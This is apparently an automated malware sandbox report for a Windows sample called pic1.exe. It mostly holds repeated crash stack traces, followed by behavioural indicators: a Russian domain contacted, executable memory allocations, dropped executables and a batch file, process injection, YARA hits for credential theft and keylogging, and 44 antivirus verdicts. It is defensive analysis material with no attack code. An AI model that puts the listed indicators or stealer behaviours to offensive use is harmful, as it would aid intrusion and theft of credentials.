__exception__ June 24, 2024, 7:45 a.m.	stacktrace: RtlCaptureContext+0x85 RtlRestoreContext-0xaa ntdll+0x50895 @ 0x76d80895 stacktrace+0x84 memdup-0x1af @ 0x73980470 hook_in_monitor+0x45 lde-0x133 @ 0x739742ea New_ntdll_NtProtectVirtualMemory+0x34 New_ntdll_NtQueryAttributesFile-0x151 @ 0x73993603 VirtualProtectEx+0x33 MapViewOfFile-0x2d kernelbase+0x13243 @ 0x7fefd503243 VirtualProtect+0x1b VirtualProtectEx-0x15 kernelbase+0x131fb @ 0x7fefd5031fb driver+0x1be7cf @ 0x1401be7cf GetProcessAffinityMask+0x80 SetThreadContext-0x20 kernel32+0x2ef0 @ 0x76c12ef0 0x880fff GetProcessAffinityMask+0x80 SetThreadContext-0x20 kernel32+0x2ef0 @ 0x76c12ef0 driver+0x882000 @ 0x140882000 driver+0x1000 @ 0x140001000 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 exception.instruction_r: 0f ae 81 00 01 00 00 0f 29 81 a0 01 00 00 0f 29 exception.symbol: RtlCaptureContext+0x85 RtlRestoreContext-0xaa ntdll+0x50895 exception.address: 0x76d80895 exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 329877 registers.r14: 0 registers.r15: 0 registers.rcx: 1242680 registers.rsi: 5377630208 registers.r10: 0 registers.rbx: 1992371952 registers.rsp: 1244968 registers.r11: 514 registers.r8: 64 registers.r9: 4 registers.rdx: 1244024 registers.r12: 0 registers.rbp: 0 registers.rdi: 5368709487 registers.rax: 1242360 registers.r13: 0	1
__exception__ June 24, 2024, 7:45 a.m.	stacktrace: RtlCaptureContext+0x85 RtlRestoreContext-0xaa ntdll+0x50895 @ 0x76d80895 stacktrace+0x84 memdup-0x1af @ 0x73980470 hook_in_monitor+0x45 lde-0x133 @ 0x739742ea New_ntdll_NtProtectVirtualMemory+0x34 New_ntdll_NtQueryAttributesFile-0x151 @ 0x73993603 VirtualProtectEx+0x33 MapViewOfFile-0x2d kernelbase+0x13243 @ 0x7fefd503243 VirtualProtect+0x1b VirtualProtectEx-0x15 kernelbase+0x131fb @ 0x7fefd5031fb driver+0x1be7cf @ 0x1401be7cf GetProcessAffinityMask+0x80 SetThreadContext-0x20 kernel32+0x2ef0 @ 0x76c12ef0 0x880fff GetProcessAffinityMask+0x80 SetThreadContext-0x20 kernel32+0x2ef0 @ 0x76c12ef0 driver+0x882000 @ 0x140882000 driver+0x1000 @ 0x140001000 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 exception.instruction_r: 0f ae 81 00 01 00 00 0f 29 81 a0 01 00 00 0f 29 exception.symbol: RtlCaptureContext+0x85 RtlRestoreContext-0xaa ntdll+0x50895 exception.address: 0x76d80895 exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 329877 registers.r14: 0 registers.r15: 0 registers.rcx: 1242680 registers.rsi: 5377630208 registers.r10: 0 registers.rbx: 1992371952 registers.rsp: 1244968 registers.r11: 514 registers.r8: 64 registers.r9: 4 registers.rdx: 1244024 registers.r12: 0 registers.rbp: 0 registers.rdi: 5368709487 registers.rax: 1242360 registers.r13: 0	1
__exception__ June 24, 2024, 7:45 a.m.	stacktrace: RtlCaptureContext+0x85 RtlRestoreContext-0xaa ntdll+0x50895 @ 0x76d80895 stacktrace+0x84 memdup-0x1af @ 0x73980470 hook_in_monitor+0x45 lde-0x133 @ 0x739742ea New_ntdll_NtProtectVirtualMemory+0x34 New_ntdll_NtQueryAttributesFile-0x151 @ 0x73993603 VirtualProtectEx+0x33 MapViewOfFile-0x2d kernelbase+0x13243 @ 0x7fefd503243 VirtualProtect+0x1b VirtualProtectEx-0x15 kernelbase+0x131fb @ 0x7fefd5031fb driver+0x1be7cf @ 0x1401be7cf GetProcessAffinityMask+0x80 SetThreadContext-0x20 kernel32+0x2ef0 @ 0x76c12ef0 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff exception.instruction_r: 0f ae 81 00 01 00 00 0f 29 81 a0 01 00 00 0f 29 exception.symbol: RtlCaptureContext+0x85 RtlRestoreContext-0xaa ntdll+0x50895 exception.address: 0x76d80895 exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 329877 registers.r14: 0 registers.r15: 0 registers.rcx: 1242680 registers.rsi: 5377630208 registers.r10: 0 registers.rbx: 1992371952 registers.rsp: 1244936 registers.r11: 514 registers.r8: 64 registers.r9: 4 registers.rdx: 1244024 registers.r12: 0 registers.rbp: 0 registers.rdi: 5368709487 registers.rax: 1242360 registers.r13: 0	1
__exception__ June 24, 2024, 7:45 a.m.	stacktrace: RtlCaptureContext+0x85 RtlRestoreContext-0xaa ntdll+0x50895 @ 0x76d80895 stacktrace+0x84 memdup-0x1af @ 0x73980470 hook_in_monitor+0x45 lde-0x133 @ 0x739742ea New_ntdll_NtProtectVirtualMemory+0x34 New_ntdll_NtQueryAttributesFile-0x151 @ 0x73993603 VirtualProtectEx+0x33 MapViewOfFile-0x2d kernelbase+0x13243 @ 0x7fefd503243 VirtualProtect+0x1b VirtualProtectEx-0x15 kernelbase+0x131fb @ 0x7fefd5031fb driver+0x1be7cf @ 0x1401be7cf GetProcessAffinityMask+0x80 SetThreadContext-0x20 kernel32+0x2ef0 @ 0x76c12ef0 0x880fff GetProcessAffinityMask+0x80 SetThreadContext-0x20 kernel32+0x2ef0 @ 0x76c12ef0 driver+0x882000 @ 0x140882000 driver+0x1000 @ 0x140001000 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 exception.instruction_r: 0f ae 81 00 01 00 00 0f 29 81 a0 01 00 00 0f 29 exception.symbol: RtlCaptureContext+0x85 RtlRestoreContext-0xaa ntdll+0x50895 exception.address: 0x76d80895 exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 329877 registers.r14: 0 registers.r15: 0 registers.rcx: 1242680 registers.rsi: 5377630208 registers.r10: 0 registers.rbx: 1992371952 registers.rsp: 1244968 registers.r11: 514 registers.r8: 64 registers.r9: 4 registers.rdx: 1244024 registers.r12: 0 registers.rbp: 0 registers.rdi: 5368709487 registers.rax: 1242360 registers.r13: 0	1
__exception__ June 24, 2024, 7:45 a.m.	stacktrace: RtlCaptureContext+0x85 RtlRestoreContext-0xaa ntdll+0x50895 @ 0x76d80895 stacktrace+0x84 memdup-0x1af @ 0x73980470 hook_in_monitor+0x45 lde-0x133 @ 0x739742ea New_ntdll_NtProtectVirtualMemory+0x34 New_ntdll_NtQueryAttributesFile-0x151 @ 0x73993603 VirtualProtectEx+0x33 MapViewOfFile-0x2d kernelbase+0x13243 @ 0x7fefd503243 VirtualProtect+0x1b VirtualProtectEx-0x15 kernelbase+0x131fb @ 0x7fefd5031fb driver+0x1be7cf @ 0x1401be7cf GetProcessAffinityMask+0x80 SetThreadContext-0x20 kernel32+0x2ef0 @ 0x76c12ef0 0x880fff GetProcessAffinityMask+0x80 SetThreadContext-0x20 kernel32+0x2ef0 @ 0x76c12ef0 driver+0x882000 @ 0x140882000 driver+0x1000 @ 0x140001000 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 exception.instruction_r: 0f ae 81 00 01 00 00 0f 29 81 a0 01 00 00 0f 29 exception.symbol: RtlCaptureContext+0x85 RtlRestoreContext-0xaa ntdll+0x50895 exception.address: 0x76d80895 exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 329877 registers.r14: 0 registers.r15: 0 registers.rcx: 1242680 registers.rsi: 5377630208 registers.r10: 0 registers.rbx: 1992371952 registers.rsp: 1244968 registers.r11: 514 registers.r8: 64 registers.r9: 4 registers.rdx: 1244024 registers.r12: 0 registers.rbp: 0 registers.rdi: 5368709487 registers.rax: 1242360 registers.r13: 0	1
__exception__ June 24, 2024, 7:45 a.m.	stacktrace: RtlCaptureContext+0x85 RtlRestoreContext-0xaa ntdll+0x50895 @ 0x76d80895 stacktrace+0x84 memdup-0x1af @ 0x73980470 hook_in_monitor+0x45 lde-0x133 @ 0x739742ea New_ntdll_NtProtectVirtualMemory+0x34 New_ntdll_NtQueryAttributesFile-0x151 @ 0x73993603 VirtualProtectEx+0x33 MapViewOfFile-0x2d kernelbase+0x13243 @ 0x7fefd503243 VirtualProtect+0x1b VirtualProtectEx-0x15 kernelbase+0x131fb @ 0x7fefd5031fb driver+0x1be7cf @ 0x1401be7cf GetProcessAffinityMask+0x80 SetThreadContext-0x20 kernel32+0x2ef0 @ 0x76c12ef0 0x880fff GetProcessAffinityMask+0x80 SetThreadContext-0x20 kernel32+0x2ef0 @ 0x76c12ef0 driver+0x882000 @ 0x140882000 driver+0x1000 @ 0x140001000 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 exception.instruction_r: 0f ae 81 00 01 00 00 0f 29 81 a0 01 00 00 0f 29 exception.symbol: RtlCaptureContext+0x85 RtlRestoreContext-0xaa ntdll+0x50895 exception.address: 0x76d80895 exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 329877 registers.r14: 0 registers.r15: 0 registers.rcx: 1242680 registers.rsi: 5377630208 registers.r10: 0 registers.rbx: 1992371952 registers.rsp: 1244968 registers.r11: 514 registers.r8: 64 registers.r9: 4 registers.rdx: 1244024 registers.r12: 0 registers.rbp: 0 registers.rdi: 5368709487 registers.rax: 1242360 registers.r13: 0	1
__exception__ June 24, 2024, 7:45 a.m.	stacktrace: RtlCaptureContext+0x85 RtlRestoreContext-0xaa ntdll+0x50895 @ 0x76d80895 stacktrace+0x84 memdup-0x1af @ 0x73980470 hook_in_monitor+0x45 lde-0x133 @ 0x739742ea New_ntdll_NtProtectVirtualMemory+0x34 New_ntdll_NtQueryAttributesFile-0x151 @ 0x73993603 VirtualProtectEx+0x33 MapViewOfFile-0x2d kernelbase+0x13243 @ 0x7fefd503243 VirtualProtect+0x1b VirtualProtectEx-0x15 kernelbase+0x131fb @ 0x7fefd5031fb driver+0x1be7cf @ 0x1401be7cf GetProcessAffinityMask+0x80 SetThreadContext-0x20 kernel32+0x2ef0 @ 0x76c12ef0 0x880fff GetProcessAffinityMask+0x80 SetThreadContext-0x20 kernel32+0x2ef0 @ 0x76c12ef0 driver+0x882000 @ 0x140882000 driver+0x1000 @ 0x140001000 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 exception.instruction_r: 0f ae 81 00 01 00 00 0f 29 81 a0 01 00 00 0f 29 exception.symbol: RtlCaptureContext+0x85 RtlRestoreContext-0xaa ntdll+0x50895 exception.address: 0x76d80895 exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 329877 registers.r14: 0 registers.r15: 0 registers.rcx: 1242680 registers.rsi: 5377630208 registers.r10: 0 registers.rbx: 1992371952 registers.rsp: 1244968 registers.r11: 514 registers.r8: 64 registers.r9: 4 registers.rdx: 1244024 registers.r12: 0 registers.rbp: 0 registers.rdi: 5368709487 registers.rax: 1242360 registers.r13: 0	1
__exception__ June 24, 2024, 7:46 a.m.	stacktrace: RtlCaptureContext+0x85 RtlRestoreContext-0xaa ntdll+0x50895 @ 0x76d80895 stacktrace+0x84 memdup-0x1af @ 0x73980470 hook_in_monitor+0x45 lde-0x133 @ 0x739742ea New_ntdll_NtProtectVirtualMemory+0x34 New_ntdll_NtQueryAttributesFile-0x151 @ 0x73993603 VirtualProtectEx+0x33 MapViewOfFile-0x2d kernelbase+0x13243 @ 0x7fefd503243 VirtualProtect+0x1b VirtualProtectEx-0x15 kernelbase+0x131fb @ 0x7fefd5031fb driver+0x1be7cf @ 0x1401be7cf GetProcessAffinityMask+0x80 SetThreadContext-0x20 kernel32+0x2ef0 @ 0x76c12ef0 0x880fff GetProcessAffinityMask+0x80 SetThreadContext-0x20 kernel32+0x2ef0 @ 0x76c12ef0 driver+0x882000 @ 0x140882000 driver+0x1000 @ 0x140001000 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 exception.instruction_r: 0f ae 81 00 01 00 00 0f 29 81 a0 01 00 00 0f 29 exception.symbol: RtlCaptureContext+0x85 RtlRestoreContext-0xaa ntdll+0x50895 exception.address: 0x76d80895 exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 329877 registers.r14: 0 registers.r15: 0 registers.rcx: 1242680 registers.rsi: 5377630208 registers.r10: 0 registers.rbx: 1992371952 registers.rsp: 1244968 registers.r11: 514 registers.r8: 64 registers.r9: 4 registers.rdx: 1244024 registers.r12: 0 registers.rbp: 0 registers.rdi: 5368709487 registers.rax: 1242360 registers.r13: 0	1
__exception__ June 24, 2024, 7:46 a.m.	stacktrace: RtlCaptureContext+0x85 RtlRestoreContext-0xaa ntdll+0x50895 @ 0x76d80895 stacktrace+0x84 memdup-0x1af @ 0x73980470 hook_in_monitor+0x45 lde-0x133 @ 0x739742ea New_ntdll_NtProtectVirtualMemory+0x34 New_ntdll_NtQueryAttributesFile-0x151 @ 0x73993603 VirtualProtectEx+0x33 MapViewOfFile-0x2d kernelbase+0x13243 @ 0x7fefd503243 VirtualProtect+0x1b VirtualProtectEx-0x15 kernelbase+0x131fb @ 0x7fefd5031fb driver+0x1be7cf @ 0x1401be7cf GetProcessAffinityMask+0x80 SetThreadContext-0x20 kernel32+0x2ef0 @ 0x76c12ef0 0x880fff GetProcessAffinityMask+0x80 SetThreadContext-0x20 kernel32+0x2ef0 @ 0x76c12ef0 driver+0x882000 @ 0x140882000 driver+0x1000 @ 0x140001000 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 exception.instruction_r: 0f ae 81 00 01 00 00 0f 29 81 a0 01 00 00 0f 29 exception.symbol: RtlCaptureContext+0x85 RtlRestoreContext-0xaa ntdll+0x50895 exception.address: 0x76d80895 exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 329877 registers.r14: 0 registers.r15: 0 registers.rcx: 1242680 registers.rsi: 5377630208 registers.r10: 0 registers.rbx: 1992371952 registers.rsp: 1244968 registers.r11: 514 registers.r8: 64 registers.r9: 4 registers.rdx: 1244024 registers.r12: 0 registers.rbp: 0 registers.rdi: 5368709487 registers.rax: 1242360 registers.r13: 0	1
__exception__ June 24, 2024, 7:46 a.m.	stacktrace: RtlCaptureContext+0x85 RtlRestoreContext-0xaa ntdll+0x50895 @ 0x76d80895 stacktrace+0x84 memdup-0x1af @ 0x73980470 hook_in_monitor+0x45 lde-0x133 @ 0x739742ea New_ntdll_NtProtectVirtualMemory+0x34 New_ntdll_NtQueryAttributesFile-0x151 @ 0x73993603 VirtualProtectEx+0x33 MapViewOfFile-0x2d kernelbase+0x13243 @ 0x7fefd503243 VirtualProtect+0x1b VirtualProtectEx-0x15 kernelbase+0x131fb @ 0x7fefd5031fb driver+0x1be7cf @ 0x1401be7cf GetProcessAffinityMask+0x80 SetThreadContext-0x20 kernel32+0x2ef0 @ 0x76c12ef0 0x880fff GetProcessAffinityMask+0x80 SetThreadContext-0x20 kernel32+0x2ef0 @ 0x76c12ef0 driver+0x882000 @ 0x140882000 driver+0x1000 @ 0x140001000 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 exception.instruction_r: 0f ae 81 00 01 00 00 0f 29 81 a0 01 00 00 0f 29 exception.symbol: RtlCaptureContext+0x85 RtlRestoreContext-0xaa ntdll+0x50895 exception.address: 0x76d80895 exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 329877 registers.r14: 0 registers.r15: 0 registers.rcx: 1242680 registers.rsi: 5377630208 registers.r10: 0 registers.rbx: 1992371952 registers.rsp: 1244968 registers.r11: 514 registers.r8: 64 registers.r9: 4 registers.rdx: 1244024 registers.r12: 0 registers.rbp: 0 registers.rdi: 5368709487 registers.rax: 1242360 registers.r13: 0	1
__exception__ June 24, 2024, 7:46 a.m.	stacktrace: RtlCaptureContext+0x85 RtlRestoreContext-0xaa ntdll+0x50895 @ 0x76d80895 stacktrace+0x84 memdup-0x1af @ 0x73980470 hook_in_monitor+0x45 lde-0x133 @ 0x739742ea New_ntdll_NtProtectVirtualMemory+0x34 New_ntdll_NtQueryAttributesFile-0x151 @ 0x73993603 VirtualProtectEx+0x33 MapViewOfFile-0x2d kernelbase+0x13243 @ 0x7fefd503243 VirtualProtect+0x1b VirtualProtectEx-0x15 kernelbase+0x131fb @ 0x7fefd5031fb driver+0x1be7cf @ 0x1401be7cf GetProcessAffinityMask+0x80 SetThreadContext-0x20 kernel32+0x2ef0 @ 0x76c12ef0 0x880fff GetProcessAffinityMask+0x80 SetThreadContext-0x20 kernel32+0x2ef0 @ 0x76c12ef0 driver+0x882000 @ 0x140882000 driver+0x1000 @ 0x140001000 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 exception.instruction_r: 0f ae 81 00 01 00 00 0f 29 81 a0 01 00 00 0f 29 exception.symbol: RtlCaptureContext+0x85 RtlRestoreContext-0xaa ntdll+0x50895 exception.address: 0x76d80895 exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 329877 registers.r14: 0 registers.r15: 0 registers.rcx: 1242680 registers.rsi: 5377630208 registers.r10: 0 registers.rbx: 1992371952 registers.rsp: 1244968 registers.r11: 514 registers.r8: 64 registers.r9: 4 registers.rdx: 1244024 registers.r12: 0 registers.rbp: 0 registers.rdi: 5368709487 registers.rax: 1242360 registers.r13: 0	1

Resolves a suspicious Top Level Domain (TLD) (1 event)

domain

cv99160.tw1.ru

description

Russian Federation domain TLD

Allocates read-write-execute memory (usually to unpack itself) (3 events)

Time & API	Arguments	Status
NtProtectVirtualMemory June 24, 2024, 7:36 a.m.	process_identifier: 2556 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000000007304c000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory June 24, 2024, 7:37 a.m.	process_identifier: 2804 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000000007304c000 process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory June 24, 2024, 7:38 a.m.	process_identifier: 1452 region_size: 65536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000046c0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1

Creates executable files on the filesystem (3 events)

file	C:\Users\test22\AppData\Local\Temp\RarSFX1\yondex.exe
file	C:\Users\test22\AppData\Local\Temp\RarSFX0\rolex.exe
file	C:\Users\test22\AppData\Local\Temp\RarSFX0\1.bat

Yara rule detected in process memory (31 events)

description	Create a windows service	rule	Create_Service
description	Communications over RAW Socket	rule	Network_TCP_Socket
description	Communication using DGA	rule	Network_DGA
description	Match Windows Http API call	rule	Str_Win32_Http_API
description	Take ScreenShot	rule	ScreenShot
description	Escalate priviledges	rule	Escalate_priviledges
description	Steal credential	rule	local_credential_Steal
description	PWS Memory	rule	Generic_PWS_Memory_Zero
description	Record Audio	rule	Sniff_Audio
description	Communications over HTTP	rule	Network_HTTP
description	Communications use DNS	rule	Network_DNS
description	Code injection with CreateRemoteThread in a remote process	rule	Code_injection
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerCheck__RemoteAPI
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	DebuggerException__ConsoleCtrl
description	(no description)	rule	DebuggerException__SetConsoleCtrl
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	(no description)	rule	Check_Dlls
description	Checks if being debugged	rule	anti_dbg
description	Anti-Sandbox checks for ThreatExpert	rule	antisb_threatExpert
description	Bypass DEP	rule	disable_dep
description	Affect hook table	rule	win_hook
description	File Downloader	rule	Network_Downloader
description	Match Windows Inet API call	rule	Str_Win32_Internet_API
description	Communications over FTP	rule	Network_FTP
description	Run a KeyLogger	rule	KeyLogger
description	Communications over P2P network	rule	Network_P2P_Win

Creates an executable file in a user folder (1 event)

file	C:\Users\test22\AppData\Roaming\Sysfiles\Driver.exe

Drops a binary and executes it (2 events)

file	C:\Users\test22\AppData\Local\Temp\RarSFX0\1.bat
file	C:\Users\test22\AppData\Local\Temp\RarSFX0\rolex.exe

Resumed a suspended thread in a remote process potentially indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2736 resumed a thread in remote process 2804
NtResumeThread June 24, 2024, 7:37 a.m.	thread_handle: 0x000000000000006c suspend_count: 0 process_identifier: 2804	1	0	0

File has been identified by 44 AntiVirus engines on VirusTotal as malicious (44 events)

Bkav	W64.AIDetectMalware
Lionic	Trojan.BAT.Starter.tsAs
Elastic	malicious (high confidence)
Cynet	Malicious (score: 99)
Skyhigh	BehavesLike.Win64.CoinMiner.rc
ALYac	Gen:Variant.Mino.1
Cylance	Unsafe
VIPRE	Gen:Variant.Mino.1
Sangfor	Trojan.Win32.Agent.Vr3n
K7AntiVirus	Spyware ( 005b10b61 )
BitDefender	Gen:Variant.Mino.1
K7GW	Spyware ( 005b10b61 )
Cybereason	malicious.1b5620
Arcabit	Trojan.Mino.1
Symantec	Infostealer
McAfee	Artemis!1FECBC51B562
Avast	Win64:Malware-gen
ClamAV	Win.Dropper.Nanocore-9986456-0
Kaspersky	UDS:DangerousObject.Multi.Generic
Alibaba	Trojan:Win64/Genric.affcf6dc
MicroWorld-eScan	Gen:Variant.Mino.1
Emsisoft	Gen:Variant.Mino.1 (B)
F-Secure	Trojan.TR/AD.Nekark.kekhn
Zillya	Exploit.UAC.Win32.999
TrendMicro	Trojan.Win64.SMOKELOADER.YXEFWZ
McAfeeD	ti!9A4C96B22721
FireEye	Generic.mg.1fecbc51b5620e57
Sophos	Mal/Generic-S
Jiangmin	Worm.MSIL.vpw
Avira	TR/AD.Nekark.kekhn
Kingsoft	Win32.Trojan.Generic.a
Gridinsoft	Ransom.Win64.Wacatac.sa
Microsoft	Trojan:Win64/DisguisedXMRigMiner
ZoneAlarm	UDS:DangerousObject.Multi.Generic
GData	Gen:Variant.Mino.1
Varist	W64/ABRisk.QPGL-2825
DeepInstinct	MALICIOUS
Panda	Trj/CI.A
TrendMicro-HouseCall	Trojan.Win64.SMOKELOADER.YXEFWZ
MAX	malware (ai score=85)
MaxSecure	Win.MxResIcn.Heur.Gen
AVG	Win64:Malware-gen
Paloalto	generic.ml
CrowdStrike	win/malicious_confidence_90% (W)

pic1.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All